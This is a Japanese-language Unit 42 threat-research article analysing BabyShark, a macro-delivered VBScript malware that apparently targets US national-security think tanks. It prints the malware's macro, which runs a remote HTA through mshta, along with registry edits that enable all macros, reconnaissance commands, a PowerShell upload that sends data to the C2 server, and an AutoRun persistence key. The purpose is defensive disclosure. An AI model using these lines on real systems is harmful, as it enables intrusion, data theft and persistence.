[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/new-babyshark-malware-targets-u-s-national-security-think-tanks/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# 北朝鮮による攻撃との関与が疑われる新しいマルウェアが、米国の国家安全保障シンクタンクを標的に

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 2 分で読めます  
Related Products  
[![Advanced Threat Prevention icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced Threat Prevention](https://unit42.paloaltonetworks.com/ja/product-category/advanced-threat-prevention-ja/ "Advanced Threat Prevention")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xdr-ja/ "Cortex XDR")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Unit 42](https://unit42.paloaltonetworks.com/ja/author/unit42/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2019年2月22日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [国家支援型サイバー攻撃](https://unit42.paloaltonetworks.com/ja/category/nation-state-cyberattacks-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [BabyShark](https://unit42.paloaltonetworks.com/ja/tag/babyshark-ja/)
  * [KimJongRAT](https://unit42.paloaltonetworks.com/ja/tag/kimjongrat-ja/)
  * [STOLEN PENCIL](https://unit42.paloaltonetworks.com/ja/tag/stolen-pencil-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/new-babyshark-malware-targets-u-s-national-security-think-tanks/?pdf=download&lg=ja&_wpnonce=b82091c0d3 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/new-babyshark-malware-targets-u-s-national-security-think-tanks/?pdf=print&lg=ja&_wpnonce=b82091c0d3 "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=北朝鮮による攻撃との関与が疑われる新しいマルウェアが、米国の国家安全保障シンクタンクを標的に&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-babyshark-malware-targets-u-s-national-security-think-tanks%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-babyshark-malware-targets-u-s-national-security-think-tanks%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-babyshark-malware-targets-u-s-national-security-think-tanks%2F&title=北朝鮮による攻撃との関与が疑われる新しいマルウェアが、米国の国家安全保障シンクタンクを標的に "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-babyshark-malware-targets-u-s-national-security-think-tanks%2F&text=北朝鮮による攻撃との関与が疑われる新しいマルウェアが、米国の国家安全保障シンクタンクを標的に "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-babyshark-malware-targets-u-s-national-security-think-tanks%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=北朝鮮による攻撃との関与が疑われる新しいマルウェアが、米国の国家安全保障シンクタンクを標的に%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-babyshark-malware-targets-u-s-national-security-think-tanks%2F "Share in Mastodon")

## 概要

2019年2月、Palo Alto Networks脅威インテリジェンス調査チームUnit 42は、2018年11月に送信されたスピアフィッシング電子メールを特定しました。その電子メールには､新しいマルウェアが含まれていましたが､このマルウェアが利用するインフラストラクチャは､北朝鮮による攻撃キャンペーンに結びついたプレイブックと同じものでした｡

このスピアフィッシングメールは､現在米国でコンサルタントとして働いている核セキュリティ専門家が送信したように装って書かれており､この専門家の名でパブリックなメールアドレスから送信され､件名で北朝鮮の核問題について触れられていました。

当該メールには悪意のあるExcelマクロ文書が添付されており､実行されるとMicrosoft Visual Basic(VB)スクリプトベースの新しいマルウェアファミリが作成されます｡Unit 42 ではこのマルウェアファミリを「BabyShark」と呼んでいます。

BabySharkは比較的新しいマルウェアで､私たちがオープンソースリポジトリと社内のデータセットから見つけた最初期のサンプルは2018年11月のものでした。マルウェアは最初のステップとなるHTA(HTMLを利用してWindowsアプリを作る技術)をリモートの場所から実行することで起動されます｡

このため､PEファイル､悪意のある文書など、さまざまな種類のファイルで配信される可能性があります。このHTAはシステム情報をC2サーバーに漏出させ、システム上で永続性を維持し、オペレータからの次の指示を待ちます。以下の図1は実行の流れを示しています。
![図1 BabySharkの実行フロー](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-2-1024x624.jpeg) 図1 BabySharkの実行フロー

Unit 42は当該フィッシングメールが少なくとも次の機関を標的としていることを特定できました。

* アメリカのある大学｡ここで当時の北朝鮮非核化問題に関する会議を開催予定だった
* アメリカに本拠を置くある研究所｡この研究所は国家安全保障問題のシンクタンクとして機能しており、先の原子力専門家が現在働いている

Unit 42 は､検索範囲を公開されているリポジトリのサンプルに広げ、BabySharkを配信する悪意のあるドキュメントのサンプルを追加で特定しました。これらのサンプルの元ファイル名とおとり文書(ルアー)の内容から、攻撃者は北朝鮮についてだけでなく広く北東アジア地域を対象とした情報を収集することに関心があった可能性が高いことが示唆されました。

調査を進めるうち､過去に北朝鮮由来と疑われていた活動とのつながりが見つかりました。 [KimJongRAT](https://malware.lu/assets/files/articles/RAP003_KimJongRAT-Stealer_Analysis.1.0.pdf)と[STOLEN PENCIL](https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/)です。

## 悪意のある文書

BabySharkは比較的新しいマルウェアで､私たちが観測した最初のサンプルは2018年11月のものです。BabySharkを配信するすべての悪意のあるドキュメントのおとり文書は英語で書かれており、北東アジア地域のセキュリティ問題に関連しているものでした。
![図2 BabySharkの悪意のあるドキュメントとファイル名/おとり文書のタイムライン](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-3.jpeg) 図2 BabySharkの悪意のあるドキュメントとファイル名/おとり文書のタイムライン

おとり文書の中にはインターネット上で公開された情報として入手できる情報をコンテンツとしているものもありましたが、なかには未公開のものと思われるコンテンツもありました。この未公開コンテンツを含む文書のメタデータを調べたところ、この脅威攻撃者は米国国家安全保障シンクタンクにいるある個人を侵害することでプライベートな文書へのアクセス権を得たことが疑われます。
![図3 インターネットからコピーされたおとり文書のコンテンツ](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-148-1024x780.png) 図3 インターネットからコピーされたおとり文書のコンテンツ ![図4 インターネット上で一般に公開されていないおとりのコンテンツ（意図的にぼかしてあります）](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-149.png) 図4 インターネット上で一般に公開されていないおとりのコンテンツ（意図的にぼかしてあります）

悪意のあるドキュメントには、BabySharkの最初のステップとなるHTAをリモートの場所からロードする単純なマクロが含まれています。  
Sub AutoOpen() Shell ("mshta https://tdalpacafarm\[.\]com/files/kr/contents/Vkggy0.hta") End Sub

|-------|--------------------------------------------------------------------------------------------------|
| 1 2 3 | Sub AutoOpen() Shell ("mshta https://tdalpacafarm\[.\]com/files/kr/contents/Vkggy0.hta") End Sub |

## BabySharkマルウェアの解析

分析されたサンプルの詳細は次のとおりです:

|------------|------------------------------------------------------------------|
| **SHA256** | 9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8 |
| **作成日**    | 2018:12:31 02:40:00Z                                             |
| **変更日**    | 2019:01:10 06:54:00Z                                             |
| **ファイル名**  | Oct\_Bld\_full\_view.docm                                           |

*表1 分析サンプルの詳細*

このサンプルは悪意のあるマクロを含むWord文書で､リモートの場所にあるHTAファイルを実行することでBabySharkをロードします｡

https://tdalpacafarm\[.\]com/files/kr/contents/Vkggy0.hta

HTAを正常にロードした後、HTTP GETリクエストを同じC2サーバー上の別の場所に送信し、次のデコード用関数でレスポンスの内容を解読します。  
Function Co00(c) L=Len(c) s="" For jx=0 To d-1 For ix=0 To Int(L/d)-1 s=s\&amp;Mid(c,ix\*d+jx+1,1) Next Next s=s\&amp;Right(c,L-Int(L/d)\*d) Co00=s End Function

|-------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 | Function Co00(c) L=Len(c) s="" For jx=0 To d-1 For ix=0 To Int(L/d)-1 s=s\&amp;Mid(c,ix\*d+jx+1,1) Next Next s=s\&amp;Right(c,L-Int(L/d)\*d) Co00=s End Function |

デコードされたBabyShark VBスクリプトは、まず次のレジストリキーを追加して､Microsoft WordおよびExcel用に今後のすべてのマクロを有効にします。

HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\VBAWarnings, value:1  
HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\VBAWarnings, value:1  
HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings, value:1  
HKCU\\Software\\Microsoft\\Office\\14.0\\WORD\\Security\\VBAWarnings, value:1  
HKCU\\Software\\Microsoft\\Office\\15.0\\WORD\\Security\\VBAWarnings, value:1  
HKCU\\Software\\Microsoft\\Office\\16.0\\WORD\\Security\\VBAWarnings, value:1

その後、一連のWindowsコマンドを発行し、その結果を％AppData％\\Microsoft\\ttmp.logに保存します。  
whoami hostname ipconfig /all net user dir "%programfiles%" dir "%programfiles% (x86)" dir "%programdata%\\Microsoft\\Windows\\Start Menu" dir "%programdata%\\Microsoft\\Windows\\Start Menu\\Programs" dir "%appdata%\\Microsoft\\Windows\\Recent" tasklist ver set reg query "HKEY\_CURRENT\_USER\\Software\\Microsoft\\Terminal Server Client\\Default"

|-------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 | whoami hostname ipconfig /all net user dir "%programfiles%" dir "%programfiles% (x86)" dir "%programdata%\\Microsoft\\Windows\\Start Menu" dir "%programdata%\\Microsoft\\Windows\\Start Menu\\Programs" dir "%appdata%\\Microsoft\\Windows\\Recent" tasklist ver set reg query "HKEY\_CURRENT\_USER\\Software\\Microsoft\\Terminal Server Client\\Default" |

収集されたデータは、Windowsのcertutil.exeツールでエンコードされ、HTTP POSTリクエスト経由でC2にアップロードされます。  
retu=wShell.run("certutil -f -encode """\&amp;ttmp\&amp;""" """\&amp;ttmp1\&amp;"""",0,true) retu=wShell.run("powershell.exe (New-Object System.Net.WebClient).UploadFile('https://tdalpacafarm\[.\]com/files/kr/contents/upload.php','"\&amp;ttmp1\&amp;"');del """\&amp;ttmp1\&amp;""";del """\&amp;ttmp\&amp;"""",0,true)

|-----|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 | retu=wShell.run("certutil -f -encode """\&amp;ttmp\&amp;""" """\&amp;ttmp1\&amp;"""",0,true) retu=wShell.run("powershell.exe (New-Object System.Net.WebClient).UploadFile('https://tdalpacafarm\[.\]com/files/kr/contents/upload.php','"\&amp;ttmp1\&amp;"');del """\&amp;ttmp1\&amp;""";del """\&amp;ttmp\&amp;"""",0,true) |

BabySharkは、永続性維持のために次のレジストリキー値を追加し、オペレータからの次のコマンドを待ちますが､残念ながら私たちにはオペレータが発行した追加コマンドを集められませんでした。

HKCU\\Software\\Microsoft\\Command Processor\\AutoRun, value: "powershell.exe mshta https://tdalpacafarm\[.\]com/files/kr/contents/Usoro.hta"

このレジストリキーは、cmd.exeが起動した際､value: 部分の文字列を実行します。BabySharkは、タスクスケジューラに次のスクリプトを登録し､cmd.exeが確実に起動されるようにします。  
\[%AppData%\\Microsoft\\Axz\\zvftz.vbs\] Set wShell=CreateObject("WScript.Shell"):retu=wShell.run("cmd.exe /c taskkill /im cmd.exe",0,true) \[%AppData%\\Adobe\\Gqe\\urjlt.js\] wShell=new ActiveXObject("WScript.Shell");retu=wShell.run("cmd.exe /c taskkill /im cmd.exe"",0,true);

|---------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 | \[%AppData%\\Microsoft\\Axz\\zvftz.vbs\] Set wShell=CreateObject("WScript.Shell"):retu=wShell.run("cmd.exe /c taskkill /im cmd.exe",0,true) \[%AppData%\\Adobe\\Gqe\\urjlt.js\] wShell=new ActiveXObject("WScript.Shell");retu=wShell.run("cmd.exe /c taskkill /im cmd.exe"",0,true); |

## ほかの活動とのつながり

私たちは､北朝鮮の関与が疑われている過去の別の疑わしい活動とBabySharkとの間に関連があることに気づきました。KimJongRATとSTOLEN PENCILです。

### KimJongRATとのつながり:

* BabySharkとKimJongRATは、収集されたシステム情報を格納するために同一のファイルパス％AppData％/Microsoft/ttmp.log を使用します。
* KimJongRATにも国家安全保障関連の対象者を標的にするという同様の関心がありました。KimJongRATは次のおとりと一緒に配布されました。

|--------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------|
| **おとりファイル名**                                                                                                                                                 | **ドロッパーのSHA256**                                                 |
| Kendall-AFA 2014 Conference-17Sept14.pdf                                                                                                                     | c4547c917d8a9e027191d99239843d511328f9ec6278009d83b3b2b8349011a0 |
| U.S. Nuclear Deterrence.pdf                                                                                                                                  | 1ad53f5ff0a782fec3bce952035bc856dd940899662f9326e01cb24af4de413d |
| 제30차한미안보 안내장 ENKO.fdp.etadpU.scr (訳すと第30回韓米国家安全保障へのご招待(更新)といった内容)                                                                                            | b3e85c569e89b6d409841463acb311839356c950d9eb64b9687ddc6a71d1b01b |
| [Conference Information\_2010 IFANS Conference on Global Affairs (1001).pdf](https://contagiodump.blogspot.com/2010/10/oct-08-cve-2010-2883-pdf-nuclear.html) | 0c8f17b2130addebcb2ca75bd7a982e37ddcc49d49e79fe60e3fda767f2ec972 |

*表2 KimJongRAT配信時に使用されるおとりファイル名*

* BabySharkマルウェアの背後にいる攻撃者は､マルウェアを開発するさい､サンプルを頻繁にウイルス対策製品でテストしていました。テストサンプルには、新しくコンパイルされたKimJongRATが含まれていました。

|------------------------------------------------------------------|-------------|---------------------|------------------------------|
| **SHA256**                                                       | **サイズ**     | **コンパイルした日**        | **アンチウイルステストサイトにアップロードされた日** |
| 52b898adaaf2da71c5ad6b3dfd3ecf64623bedf505eae51f9769918dbfb6b731 | 685,568 バイト | 2019-01-04 05:44:31 | 2019-01-04 08:15:41          |

*表3 作成したばかりのテスト用KimJongRATのサンプル*

### STOLEN PENCILとのつながり:

* PEタイプのBabySharkローダーの新たにコンパイルされたテスト版は､公開されているサンプルリポジトリにアップロードされていました。サンプルは、STOLEN PENCILキャンペーンでも使用されていた､盗まれたコード署名証明書を使って署名されていました。このほかに同じ証明書で署名されていたマルウェアは確認できませんでした。

|------------------------------------------------------------------|------------|---------------------|------------------------------|
| **SHA256**                                                       | **サイズ**    | **コンパイルした日**        | **アンチウイルステストサイトにアップロードされた日** |
| 6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c | 32,912 バイト | 2018-12-21 00:34:35 | 2018-12-21 08:30:28          |

*表4 PEタイプのBabySharkローダーサンプルの署名付きテストバージョン*
![図5 コードサインの詳細](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-150-1024x678.png) 図5 コードサインの詳細

## 結論

BabySharkは2018年11月に始まった限定的なスピアフィッシングキャンペーンで使用されており、現在も継続中です。背後にいる脅威攻撃者は、北東アジアの国家安全保障問題に関連した情報を集めることに明確に焦点を当てています。巧妙に細工されたスピアフィッシングメールとおとり文書は、攻撃者が標的を知悉しており、関連するコミュニティイベントを注意深く監視して最新情報を収集している様子をうかがわせます。決定的ではありませんが、BabySharkの背後にいる攻撃者は、KimJongRATマルウェアファミリを使用したのと同じ攻撃者に関連している可能性があり、少なくともSTOLEN PENCIL攻撃キャンペーンの実行者とはリソースを共有しています。私たちはまた､攻撃者がBabyShark用PEローダーに取り組むためにテストをしている様子があることにも気が付きました。脅威攻撃者は、将来のキャンペーンでBabySharkを配信するためにさまざまな方法をとる可能性があります。

パロアルトネットワークスのお客様は、次のようにしてこの脅威から保護されています。

* WildFireとTrapsは本稿に記載したすべてのファイルをMalicious(マルウェア)と判定します。
* 攻撃者が使用するC2ドメインはThreat Preventionによりブロックされます。

AutoFocusをお使いのお客様は、本稿で説明した当該攻撃者グループによる現在も継続中の活動を次のタグで監視できます。

* [BabyShark](https://autofocus.paloaltonetworks.com/#/tag/Unit42.BabyShark)

パロアルトネットワークスは本稿で見つかったファイルサンプルや侵害の兆候などをふくむ調査結果をCyber Threat Alliance(CTA サイバー脅威アライアンス)のメンバーと共有しました。CTA のメンバーはこのインテリジェンスを使用して、お客様に保護を迅速に提供し、悪意のあるサイバー攻撃者を体系的に阻害することができます。Cyber Threat Allianceの詳細については www.cyberthreatalliance.org をご覧ください｡

## IOC

### **悪意のある文書:**

* 7b77112ac7cbb7193bcd891ce48ab2acff35e4f8d523980dff834cb42eaffafa
* 9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8
* 2b6dc1a826a4d5d5de5a30b458e6ed995a4cfb9cad8114d1197541a86905d60e
* 66439f0e377bbe8cda3e516e801a86c64688e7c3dde0287b1bfb298a5bdbc2a2
* 8ef4bc09a9534910617834457114b9217cac9cb33ae22b37889040cde4cabea6
* 331d17dbe4ee61d8f2c91d7e4af17fb38102003663872223efaa4a15099554d7
* 1334c087390fb946c894c1863dfc9f0a659f594a3d6307fb48f24c30a23e0fc0
* dc425e93e83fe02da9c76b56f6fd286eace282eaad6d8d497e17b3ec4059020a
* 94a09aff59c0c27d1049509032d5ba05e9285fd522eb20b033b8188e0fee4ff0

**盗まれた証明書で署名されたPEバージョンのローダー**

* 6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c

トップに戻る

### タグ

* [BabyShark](https://unit42.paloaltonetworks.com/ja/tag/babyshark-ja/ "BabyShark")
* [KimJongRAT](https://unit42.paloaltonetworks.com/ja/tag/kimjongrat-ja/ "KimJongRAT")
* [STOLEN PENCIL](https://unit42.paloaltonetworks.com/ja/tag/stolen-pencil-ja/ "STOLEN PENCIL")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:Unit 42脆弱性リサーチチーム、23件の新しい脆弱性を発見(2019年2月発表) - AdobeとMicrosoft](https://unit42.paloaltonetworks.com/ja/unit-42-vulnerability-research-team-discovers-23-new-vulnerabilities-february-2019-disclosures-adobe-and-microsoft/ "Unit 42脆弱性リサーチチーム、23件の新しい脆弱性を発見(2019年2月発表) - AdobeとMicrosoft")

### 目次

* 

### 関連記事

* [BabySharkマルウェアの解析パート2 -- KimJongRAT、PCRatによる攻撃継続](https://unit42.paloaltonetworks.com/ja/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/ "article - table of contents")

## 関連項目 リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
